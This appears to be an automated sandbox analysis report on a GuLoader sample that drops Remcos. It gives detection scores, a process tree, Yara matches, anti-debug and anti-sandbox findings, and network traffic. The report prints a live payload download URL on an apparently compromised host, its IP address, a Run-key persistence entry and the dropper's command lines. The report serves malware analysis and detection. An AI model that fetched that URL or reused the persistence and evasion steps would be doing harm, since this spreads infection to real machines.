Loading ...

Play interactive tourEdit tour

Analysis Report SecuriteInfo.com.Variant.Razy.845229.27038.1852

Overview

General Information

Sample Name:SecuriteInfo.com.Variant.Razy.845229.27038.1852 (renamed file extension from 1852 to exe)
Analysis ID:356590
MD5:869eae0220a293dcabf4051dd323bbd8
SHA1:395e7683548c8a25c4963e3e3c56b04b76dbf0b7
SHA256:496fa2a5a6abbc22d6a4c63e31847156d61c240d8e3a793e1b4de46e09827b52
Tags:GuLoader

Most interesting Screenshot:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Contains functionality to hide a thread from the debugger
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Yara detected VB6 Downloader Generic
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • SecuriteInfo.com.Variant.Razy.845229.27038.exe (PID: 7064 cmdline: 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe' MD5: 869EAE0220A293DCABF4051DD323BBD8)
    • SecuriteInfo.com.Variant.Razy.845229.27038.exe (PID: 6440 cmdline: 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe' MD5: 869EAE0220A293DCABF4051DD323BBD8)
      • wscript.exe (PID: 6260 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs' MD5: 7075DD7B9BE8807FCA93ACD86F724884)
        • cmd.exe (PID: 4272 cmdline: 'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\win.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 6156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • win.exe (PID: 4720 cmdline: C:\Users\user\AppData\Roaming\win.exe MD5: 869EAE0220A293DCABF4051DD323BBD8)
  • win.exe (PID: 1636 cmdline: 'C:\Users\user\AppData\Roaming\win.exe' MD5: 869EAE0220A293DCABF4051DD323BBD8)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000013.00000003.820991756.000000000094C000.00000004.00000001.sdmpLokiBot_Dropper_Packed_R11_Feb18Auto-generated rule - file scan copy.pdf.r11Florian Roth
  • 0x11c7c:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
Process Memory Space: SecuriteInfo.com.Variant.Razy.845229.27038.exe PID: 6440JoeSecurity_VB6DownloaderGenericYara detected VB6 Downloader GenericJoe Security
    Process Memory Space: SecuriteInfo.com.Variant.Razy.845229.27038.exe PID: 6440JoeSecurity_GuLoaderYara detected GuLoaderJoe Security

      Sigma Overview

      No Sigma rule has matched

      Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Multi AV Scanner detection for domain / URLShow sources
      Source: mtspsmjeli.sch.idVirustotal: Detection: 12%Perma Link
      Source: http://mtspsmjeli.sch.id/cl/Jice_remcos%202_tfkxJbdn252.binVirustotal: Detection: 13%Perma Link
      Multi AV Scanner detection for dropped fileShow sources
      Source: C:\Users\user\AppData\Roaming\win.exeVirustotal: Detection: 35%Perma Link
      Source: C:\Users\user\AppData\Roaming\win.exeReversingLabs: Detection: 39%
      Multi AV Scanner detection for submitted fileShow sources
      Source: SecuriteInfo.com.Variant.Razy.845229.27038.exeVirustotal: Detection: 35%Perma Link
      Source: SecuriteInfo.com.Variant.Razy.845229.27038.exeReversingLabs: Detection: 39%
      Machine Learning detection for dropped fileShow sources
      Source: C:\Users\user\AppData\Roaming\win.exeJoe Sandbox ML: detected
      Machine Learning detection for sampleShow sources
      Source: SecuriteInfo.com.Variant.Razy.845229.27038.exeJoe Sandbox ML: detected

      Compliance:

      barindex
      Uses 32bit PE filesShow sources
      Source: SecuriteInfo.com.Variant.Razy.845229.27038.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: Joe Sandbox ViewIP Address: 103.150.60.242 103.150.60.242
      Source: Joe Sandbox ViewASN Name: PC24NET-AS-IDPTPC24TelekomunikasiIndonesiaID PC24NET-AS-IDPTPC24TelekomunikasiIndonesiaID
      Source: global trafficHTTP traffic detected: GET /cl/Jice_remcos%202_tfkxJbdn252.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: mtspsmjeli.sch.idCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /cl/Jice_remcos%202_tfkxJbdn252.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: mtspsmjeli.sch.idCache-Control: no-cache
      Source: unknownDNS traffic detected: queries for: mtspsmjeli.sch.id
      Source: SecuriteInfo.com.Variant.Razy.845229.27038.exe, 00000013.00000002.823555856.0000000000560000.00000040.00000001.sdmpString found in binary or memory: http://mtspsmjeli.sch.id/cl/Jice_remcos%202_tfkxJbdn252.bin

      System Summary:

      barindex
      Malicious sample detected (through community Yara rule)Show sources
      Source: 00000013.00000003.820991756.000000000094C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeProcess Stats: CPU usage > 98%
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 19_2_0056688B NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 19_2_005604B6 EnumWindows,NtSetInformationThread,
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 19_2_00565209 NtSetInformationThread,
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 19_2_0056506B NtSetInformationThread,
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 19_2_0056057F NtSetInformationThread,
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 19_2_005605B2 NtSetInformationThread,
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 19_2_00563635 NtSetInformationThread,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 19_2_00560629 NtSetInformationThread,
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 19_2_0056069F NtSetInformationThread,
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 19_2_00561AA2 NtSetInformationThread,
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 19_2_00560F41 NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 19_2_00560F23 NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 1_2_00405454
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 1_2_00405872
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 1_2_00402C01
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 1_2_00405814
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 1_2_00405429
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 1_2_004054C1
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 1_2_004054C3
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 1_2_004054C5
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 1_2_004054C7
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 1_2_004054C9
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 1_2_004058CB
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 1_2_004054E0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 1_2_004058F7
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 1_2_00405488
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 1_2_0040589C
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 1_2_004054AC
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 1_2_004054B3
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 1_2_004054B5
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 1_2_004054B7
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 1_2_004054B9
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 1_2_004054BB
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 1_2_004054BD
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 1_2_00405954
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 1_2_0040556C
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 1_2_0040550A
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 1_2_0040513D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 1_2_0040553D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 1_2_004049E3
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 1_2_004055EA
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 1_2_00404DA2
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 1_2_0040525A
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 1_2_00405A06
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 1_2_0040561E
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 1_2_0040522C
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 1_2_004056DE
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 1_2_00405682
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 1_2_004052AB
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 1_2_00404B4D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 1_2_00405750
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 1_2_0040536C
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 1_2_0040576D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 1_2_0040530B
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 1_2_00405337
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 1_2_004057C0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 1_2_004057EF
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 1_2_004053FB
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 1_2_00404BFE
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 1_2_0040539A
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 1_2_0040579A
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 1_2_004043B6
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 19_2_00565853
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 19_2_00561C9A
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 19_2_005656D9
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 19_2_00561B01
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 19_2_00564FCA
      Source: SecuriteInfo.com.Variant.Razy.845229.27038.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: win.exe.19.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: SecuriteInfo.com.Variant.Razy.845229.27038.exe, 00000001.00000002.802403909.0000000000418000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCOLLUMELLIACEOUSFR.exe vs SecuriteInfo.com.Variant.Razy.845229.27038.exe
      Source: SecuriteInfo.com.Variant.Razy.845229.27038.exe, 00000001.00000002.803089059.0000000002130000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs SecuriteInfo.com.Variant.Razy.845229.27038.exe
      Source: SecuriteInfo.com.Variant.Razy.845229.27038.exe, 00000013.00000000.801506120.0000000000418000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCOLLUMELLIACEOUSFR.exe vs SecuriteInfo.com.Variant.Razy.845229.27038.exe
      Source: SecuriteInfo.com.Variant.Razy.845229.27038.exe, 00000013.00000002.828115877.000000001E290000.00000002.00000001.sdmpBinary or memory string: originalfilename vs SecuriteInfo.com.Variant.Razy.845229.27038.exe
      Source: SecuriteInfo.com.Variant.Razy.845229.27038.exe, 00000013.00000002.828115877.000000001E290000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs SecuriteInfo.com.Variant.Razy.845229.27038.exe
      Source: SecuriteInfo.com.Variant.Razy.845229.27038.exe, 00000013.00000002.824158146.0000000000936000.00000004.00000020.sdmpBinary or memory string: OriginalFilenamewscript.exe.mui` vs SecuriteInfo.com.Variant.Razy.845229.27038.exe
      Source: SecuriteInfo.com.Variant.Razy.845229.27038.exe, 00000013.00000002.824158146.0000000000936000.00000004.00000020.sdmpBinary or memory string: OriginalFilenamewscript.exe` vs SecuriteInfo.com.Variant.Razy.845229.27038.exe
      Source: SecuriteInfo.com.Variant.Razy.845229.27038.exe, 00000013.00000002.827975681.000000001E180000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs SecuriteInfo.com.Variant.Razy.845229.27038.exe
      Source: SecuriteInfo.com.Variant.Razy.845229.27038.exe, 00000013.00000002.827894653.000000001DEB0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs SecuriteInfo.com.Variant.Razy.845229.27038.exe
      Source: SecuriteInfo.com.Variant.Razy.845229.27038.exeBinary or memory string: OriginalFilenameCOLLUMELLIACEOUSFR.exe vs SecuriteInfo.com.Variant.Razy.845229.27038.exe
      Source: SecuriteInfo.com.Variant.Razy.845229.27038.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: 00000013.00000003.820991756.000000000094C000.00000004.00000001.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: classification engineClassification label: mal100.troj.evad.winEXE@10/3@1/1
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeFile created: C:\Users\user\AppData\Roaming\win.exeJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeMutant created: \Sessions\1\BaseNamedObjects\Remcos-E2OTZW
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6156:120:WilError_01
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeFile created: C:\Users\user\AppData\Local\Temp\~DFE447D3F5160C9423.TMPJump to behavior
      Source: unknownProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'
      Source: SecuriteInfo.com.Variant.Razy.845229.27038.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
      Source: C:\Users\user\AppData\Roaming\win.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
      Source: C:\Users\user\AppData\Roaming\win.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: SecuriteInfo.com.Variant.Razy.845229.27038.exeVirustotal: Detection: 35%
      Source: SecuriteInfo.com.Variant.Razy.845229.27038.exeReversingLabs: Detection: 39%
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe'
      Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe'
      Source: unknownProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'
      Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\win.exe'
      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Users\user\AppData\Roaming\win.exe C:\Users\user\AppData\Roaming\win.exe
      Source: unknownProcess created: C:\Users\user\AppData\Roaming\win.exe 'C:\Users\user\AppData\Roaming\win.exe'
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\win.exe'
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\win.exe C:\Users\user\AppData\Roaming\win.exe
      Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
      Source: Window RecorderWindow detected: More than 3 window changes detected

      Data Obfuscation:

      barindex
      Yara detected GuLoaderShow sources
      Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Variant.Razy.845229.27038.exe PID: 6440, type: MEMORY
      Yara detected VB6 Downloader GenericShow sources
      Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Variant.Razy.845229.27038.exe PID: 6440, type: MEMORY
      Source: win.exe.19.drStatic PE information: real checksum: 0x25c49 should be: 0x22c7a
      Source: SecuriteInfo.com.Variant.Razy.845229.27038.exeStatic PE information: real checksum: 0x25c49 should be: 0x22c7a
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 1_2_0040B0A6 push ds; retf
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 1_2_004059D2 push ss; iretd
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 19_2_005642B4 push ebp; iretd
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeFile created: C:\Users\user\AppData\Roaming\win.exeJump to dropped file
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run winJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run winJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\win.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\win.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\win.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\win.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\win.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\win.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\win.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\win.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\win.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\win.exeProcess information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion:

      barindex
      Detected RDTSC dummy instruction sequence (likely for instruction hammering)Show sources
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeRDTSC instruction interceptor: First address: 0000000000543047 second address: 0000000000543047 instructions:
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeRDTSC instruction interceptor: First address: 00000000005620EF second address: 00000000005620EF instructions:
      Tries to detect Any.runShow sources
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeFile opened: C:\Program Files\qga\qga.exe
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
      Source: SecuriteInfo.com.Variant.Razy.845229.27038.exeBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Tries to detect virtualization through RDTSC time measurementsShow sources
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeRDTSC instruction interceptor: First address: 0000000000543047 second address: 0000000000543047 instructions:
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeRDTSC instruction interceptor: First address: 00000000005620EF second address: 00000000005620EF instructions:
